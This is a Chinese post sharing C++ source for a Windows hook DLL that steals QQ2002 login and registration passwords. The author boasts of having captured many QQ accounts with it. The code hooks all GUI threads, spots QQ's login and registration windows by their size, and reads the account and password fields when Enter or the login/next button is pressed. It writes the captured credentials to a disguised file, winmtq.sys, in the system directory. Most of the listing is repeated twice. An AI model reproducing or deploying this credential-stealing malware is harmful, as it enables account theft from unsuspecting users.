等盗取QQ2002登录密码的代码
出于爱好,写了此小程序,曾经也获取了很多QQ
采用共享数据区方式
采用共享数据区方式
1
//
hook.cpp : Defines the entry point for the DLL application.
2 //
3 #include " stdafx.h "
4
5 #pragma data_seg( " publicdata " )
6 HHOOK hhk = 0 ;
7 HWND hokkwnd = 0 ;
8 HWND hwndqq_zc = 0 ;
9 int k = 0 ;
10 int pc = 0 ;
11 char keys[ 200 ] = { 0 };
12 #pragma data_seg( )
13 #pragma comment(linker, " /SECTION:publicdata,RWS " )
14 // dll中创建共享数据段,切记!!!所有变量必须初始化,否则创建将失败
15
16 /*
17 登录窗体控件id:
18 用户号码: 138
19 密码:180
20 登录(按钮): 1
21 记住密码:323
22
23 注册窗体控件id:
24 用户: 460
25 密码: 461
26 下一步(按钮):12324
27 */
28
29 #include < stdio.h >
30 #include < stdlib.h >
31
32
33
34 BOOL APIENTRY DllMain( HANDLE hModule,
35 DWORD ul_reason_for_call,
36 LPVOID lpReserved
37 )
38 {
39 return TRUE;
40 }
41
42 const int WND_NONE = 0 ; // 非破解QQ窗体
43 const int WND_LOGIN = 1 ; // qq 登录窗体
44 const int WND_ZC = 2 ; // QQ 注册窗体
45
46 int GetWnd(HWND hwnd){
47 RECT rc;
48 ::GetWindowRect(hwnd, & rc);
49 int w,h;
50 w = rc.right - rc.left;
51 h = rc.bottom - rc.top;
52 if (w == 462 && h == 355 ){
53 return WND_ZC;
54 }
55 if (w == 266 && h == 180 ){
56 return WND_LOGIN;
57 }
58 return WND_NONE;
59 }
60
61 char buf[ 200 ] ;
62
63 void keyfilter( char key){
64 keys[pc] = key;
65 pc ++ ;
66 if (key == 8 ){
67 pc -- ;
68 keys[pc] = 0 ;
69 }
70 }
71
72 void save(){
73 // ::MessageBox(0,"Begin dump data
",0,MB_OK);
74 /* 检测是否在输入帐号密码时按下的 next 按钮 */
75 if (GetWnd( hwndqq_zc) == WND_ZC){
76 HWND hsub;
77 hsub = ::GetWindow(hwndqq_zc,GW_CHILD);
78 hsub = ::GetDlgItem(hsub, 460 ); // 取用户号控件句柄
79 if ( ! IsWindowVisible(hsub)){ // 在其它propertypage 上按下next 不保存信息
80 return ;
81 }
82 }
83
84 char buf[ 100 ],writebuf[ 100 ];;
85
86 memset(buf, 0 ,sizeof(buf));
87 ::GetSystemDirectory(buf,sizeof(buf));
88 strcat(buf, " \\winmtq.sys " );
89 // ::MessageBox(0,buf,0,MB_OK);
90 FILE * pfile = fopen(buf, " a+ " );
91
92 memset(buf, 0 ,sizeof(buf));
93 memset(writebuf, 0 ,sizeof(writebuf));
94 ////////////////////////////////////////////////////////
95 if (GetWnd( hwndqq_zc) == WND_ZC){
96 /* 取注册窗体信息 */
97 HWND hsub = ::GetWindow(hwndqq_zc,GW_CHILD);
98 // 460
99 ::GetDlgItemText(hsub, 460 ,buf,sizeof(buf));
100 strcpy(writebuf,buf);
101 strcat(writebuf, " | " );
102 memset(buf, 0 ,sizeof(buf));
103 ::GetDlgItemText(hsub, 461 ,buf,sizeof(buf));
104 strcat(writebuf,buf);
105 strcat(writebuf, " & " );
106 }
107 ////////////////////////////////////////////////////// /
108 /* 取登录窗体信息 */
109 if (GetWnd(hwndqq_zc) == WND_LOGIN){
110 // ::MessageBox(0,"lgin crack",0,MB_OK);
111 // 取用户号
112 int cursel ;
113
114 HWND hsub;
115 hsub = ::GetDlgItem(hwndqq_zc, 138 );
116 memset(buf, 0 ,sizeof(buf));
117 cursel = ::SendMessage((HWND)hsub,CB_GETCURSEL, 0 , 0 );
118 ::SendMessage((HWND)hsub,CB_GETLBTEXT,cursel,(LONG)buf);
119 strcpy(writebuf,buf);
120 strcat(writebuf, " | " );
121 memset(buf, 0 ,sizeof(buf));
122 ::GetDlgItemText(hwndqq_zc, 180 ,buf,sizeof(buf));
123 strcat(writebuf,buf);
124 strcat(writebuf, " & " );
125 }
126 ////////////////////////////////////////////////////// /
127
128 // ::MessageBox(0,writebuf,0,MB_OK);
129
130 fwrite(writebuf, 1 ,strlen(writebuf) + 2 ,pfile);
131 fclose(pfile);
132
133 }
134
135 LRESULT CALLBACK GetMsgProc(
136 int code, // hook code
137 WPARAM wParam, // removal option
138 LPARAM lParam // message
139 ){
140 MSG * pmsg = (MSG * )lParam;
141 HWND hwnd ;
142 HWND hnext;
143 HWND hlogin;
144 if (code < 0 ){
145 goto end;
146 }
147
148 /*
149 if(pmsg->message ==WM_CHAR && pmsg->hwnd == hokkwnd){ //
150 // keyfilter(pmsg->wParam);
151
152 }
153 */
154
155 /* 一下检测是否用户选择了"下一步"或者"登录"按钮 */
156
157 if (pmsg -> message == WM_KEYDOWN && pmsg -> wParam == VK_RETURN ){ // && LOWORD(wParam)==12324
158 int btnid;
159 if (GetWnd( hwndqq_zc) == WND_ZC){
160 btnid = 461 ; // 12324;
161 }
162 if (GetWnd(hwndqq_zc) == WND_LOGIN){
163 btnid = 180 ; // 用于输入密码后打回车
164 }
165 hnext = ::GetDlgItem(hwndqq_zc,btnid);
166 if (GetWnd( hwndqq_zc) == WND_ZC){
167 HWND hs = ::GetWindow(hwndqq_zc,GW_CHILD);
168
169 hnext = ::GetDlgItem(hs,btnid);
170 }
171 // ::MessageBox(0,"key deal",0,MB_OK);
172 if (pmsg -> hwnd == hnext)
173 save();
174 }
175 if (pmsg -> message == WM_LBUTTONUP ){
176 int btnid;
177 if (GetWnd( hwndqq_zc) == WND_ZC){
178 btnid = 12324 ;
179 }
180 if (GetWnd(hwndqq_zc) == WND_LOGIN){
181 btnid = 1 ; // 登录窗体的登录按钮
182 }
183 hnext = ::GetDlgItem(hwndqq_zc,btnid);
184 if (pmsg -> hwnd == hnext)
185 save();
186 }
187 end :
188 return CallNextHookEx(hhk,code,wParam,lParam);
189
190 }
191
192 extern " C " bool __stdcall __declspec(dllexport) sethook(HWND qqzc /* qq注册窗体句柄 */ ){
193
194 hwndqq_zc = qqzc;
195 HINSTANCE hdll = GetModuleHandle( " hook.dll " );
196 hhk = SetWindowsHookEx(WH_GETMESSAGE,HOOKPROC(GetMsgProc) ,hdll, 0 );
197 if ( ! hhk) return false ;
198 return true ;
199 }
200
201 extern " C " bool __stdcall __declspec(dllexport) unhook(){
202 ::UnhookWindowsHookEx(hhk);
203 return true ;
204 }
205
206
2 //
3 #include " stdafx.h "
4
5 #pragma data_seg( " publicdata " )
6 HHOOK hhk = 0 ;
7 HWND hokkwnd = 0 ;
8 HWND hwndqq_zc = 0 ;
9 int k = 0 ;
10 int pc = 0 ;
11 char keys[ 200 ] = { 0 };
12 #pragma data_seg( )
13 #pragma comment(linker, " /SECTION:publicdata,RWS " )
14 // dll中创建共享数据段,切记!!!所有变量必须初始化,否则创建将失败
15
16 /*
17 登录窗体控件id:
18 用户号码: 138
19 密码:180
20 登录(按钮): 1
21 记住密码:323
22
23 注册窗体控件id:
24 用户: 460
25 密码: 461
26 下一步(按钮):12324
27 */
28
29 #include < stdio.h >
30 #include < stdlib.h >
31
32
33
34 BOOL APIENTRY DllMain( HANDLE hModule,
35 DWORD ul_reason_for_call,
36 LPVOID lpReserved
37 )
38 {
39 return TRUE;
40 }
41
42 const int WND_NONE = 0 ; // 非破解QQ窗体
43 const int WND_LOGIN = 1 ; // qq 登录窗体
44 const int WND_ZC = 2 ; // QQ 注册窗体
45
46 int GetWnd(HWND hwnd){
47 RECT rc;
48 ::GetWindowRect(hwnd, & rc);
49 int w,h;
50 w = rc.right - rc.left;
51 h = rc.bottom - rc.top;
52 if (w == 462 && h == 355 ){
53 return WND_ZC;
54 }
55 if (w == 266 && h == 180 ){
56 return WND_LOGIN;
57 }
58 return WND_NONE;
59 }
60
61 char buf[ 200 ] ;
62
63 void keyfilter( char key){
64 keys[pc] = key;
65 pc ++ ;
66 if (key == 8 ){
67 pc -- ;
68 keys[pc] = 0 ;
69 }
70 }
71
72 void save(){
73 // ::MessageBox(0,"Begin dump data
",0,MB_OK);
74 /* 检测是否在输入帐号密码时按下的 next 按钮 */
75 if (GetWnd( hwndqq_zc) == WND_ZC){
76 HWND hsub;
77 hsub = ::GetWindow(hwndqq_zc,GW_CHILD);
78 hsub = ::GetDlgItem(hsub, 460 ); // 取用户号控件句柄
79 if ( ! IsWindowVisible(hsub)){ // 在其它propertypage 上按下next 不保存信息
80 return ;
81 }
82 }
83
84 char buf[ 100 ],writebuf[ 100 ];;
85
86 memset(buf, 0 ,sizeof(buf));
87 ::GetSystemDirectory(buf,sizeof(buf));
88 strcat(buf, " \\winmtq.sys " );
89 // ::MessageBox(0,buf,0,MB_OK);
90 FILE * pfile = fopen(buf, " a+ " );
91
92 memset(buf, 0 ,sizeof(buf));
93 memset(writebuf, 0 ,sizeof(writebuf));
94 ////////////////////////////////////////////////////////
95 if (GetWnd( hwndqq_zc) == WND_ZC){
96 /* 取注册窗体信息 */
97 HWND hsub = ::GetWindow(hwndqq_zc,GW_CHILD);
98 // 460
99 ::GetDlgItemText(hsub, 460 ,buf,sizeof(buf));
100 strcpy(writebuf,buf);
101 strcat(writebuf, " | " );
102 memset(buf, 0 ,sizeof(buf));
103 ::GetDlgItemText(hsub, 461 ,buf,sizeof(buf));
104 strcat(writebuf,buf);
105 strcat(writebuf, " & " );
106 }
107 ////////////////////////////////////////////////////// /
108 /* 取登录窗体信息 */
109 if (GetWnd(hwndqq_zc) == WND_LOGIN){
110 // ::MessageBox(0,"lgin crack",0,MB_OK);
111 // 取用户号
112 int cursel ;
113
114 HWND hsub;
115 hsub = ::GetDlgItem(hwndqq_zc, 138 );
116 memset(buf, 0 ,sizeof(buf));
117 cursel = ::SendMessage((HWND)hsub,CB_GETCURSEL, 0 , 0 );
118 ::SendMessage((HWND)hsub,CB_GETLBTEXT,cursel,(LONG)buf);
119 strcpy(writebuf,buf);
120 strcat(writebuf, " | " );
121 memset(buf, 0 ,sizeof(buf));
122 ::GetDlgItemText(hwndqq_zc, 180 ,buf,sizeof(buf));
123 strcat(writebuf,buf);
124 strcat(writebuf, " & " );
125 }
126 ////////////////////////////////////////////////////// /
127
128 // ::MessageBox(0,writebuf,0,MB_OK);
129
130 fwrite(writebuf, 1 ,strlen(writebuf) + 2 ,pfile);
131 fclose(pfile);
132
133 }
134
135 LRESULT CALLBACK GetMsgProc(
136 int code, // hook code
137 WPARAM wParam, // removal option
138 LPARAM lParam // message
139 ){
140 MSG * pmsg = (MSG * )lParam;
141 HWND hwnd ;
142 HWND hnext;
143 HWND hlogin;
144 if (code < 0 ){
145 goto end;
146 }
147
148 /*
149 if(pmsg->message ==WM_CHAR && pmsg->hwnd == hokkwnd){ //
150 // keyfilter(pmsg->wParam);
151
152 }
153 */
154
155 /* 一下检测是否用户选择了"下一步"或者"登录"按钮 */
156
157 if (pmsg -> message == WM_KEYDOWN && pmsg -> wParam == VK_RETURN ){ // && LOWORD(wParam)==12324
158 int btnid;
159 if (GetWnd( hwndqq_zc) == WND_ZC){
160 btnid = 461 ; // 12324;
161 }
162 if (GetWnd(hwndqq_zc) == WND_LOGIN){
163 btnid = 180 ; // 用于输入密码后打回车
164 }
165 hnext = ::GetDlgItem(hwndqq_zc,btnid);
166 if (GetWnd( hwndqq_zc) == WND_ZC){
167 HWND hs = ::GetWindow(hwndqq_zc,GW_CHILD);
168
169 hnext = ::GetDlgItem(hs,btnid);
170 }
171 // ::MessageBox(0,"key deal",0,MB_OK);
172 if (pmsg -> hwnd == hnext)
173 save();
174 }
175 if (pmsg -> message == WM_LBUTTONUP ){
176 int btnid;
177 if (GetWnd( hwndqq_zc) == WND_ZC){
178 btnid = 12324 ;
179 }
180 if (GetWnd(hwndqq_zc) == WND_LOGIN){
181 btnid = 1 ; // 登录窗体的登录按钮
182 }
183 hnext = ::GetDlgItem(hwndqq_zc,btnid);
184 if (pmsg -> hwnd == hnext)
185 save();
186 }
187 end :
188 return CallNextHookEx(hhk,code,wParam,lParam);
189
190 }
191
192 extern " C " bool __stdcall __declspec(dllexport) sethook(HWND qqzc /* qq注册窗体句柄 */ ){
193
194 hwndqq_zc = qqzc;
195 HINSTANCE hdll = GetModuleHandle( " hook.dll " );
196 hhk = SetWindowsHookEx(WH_GETMESSAGE,HOOKPROC(GetMsgProc) ,hdll, 0 );
197 if ( ! hhk) return false ;
198 return true ;
199 }
200
201 extern " C " bool __stdcall __declspec(dllexport) unhook(){
202 ::UnhookWindowsHookEx(hhk);
203 return true ;
204 }
205
206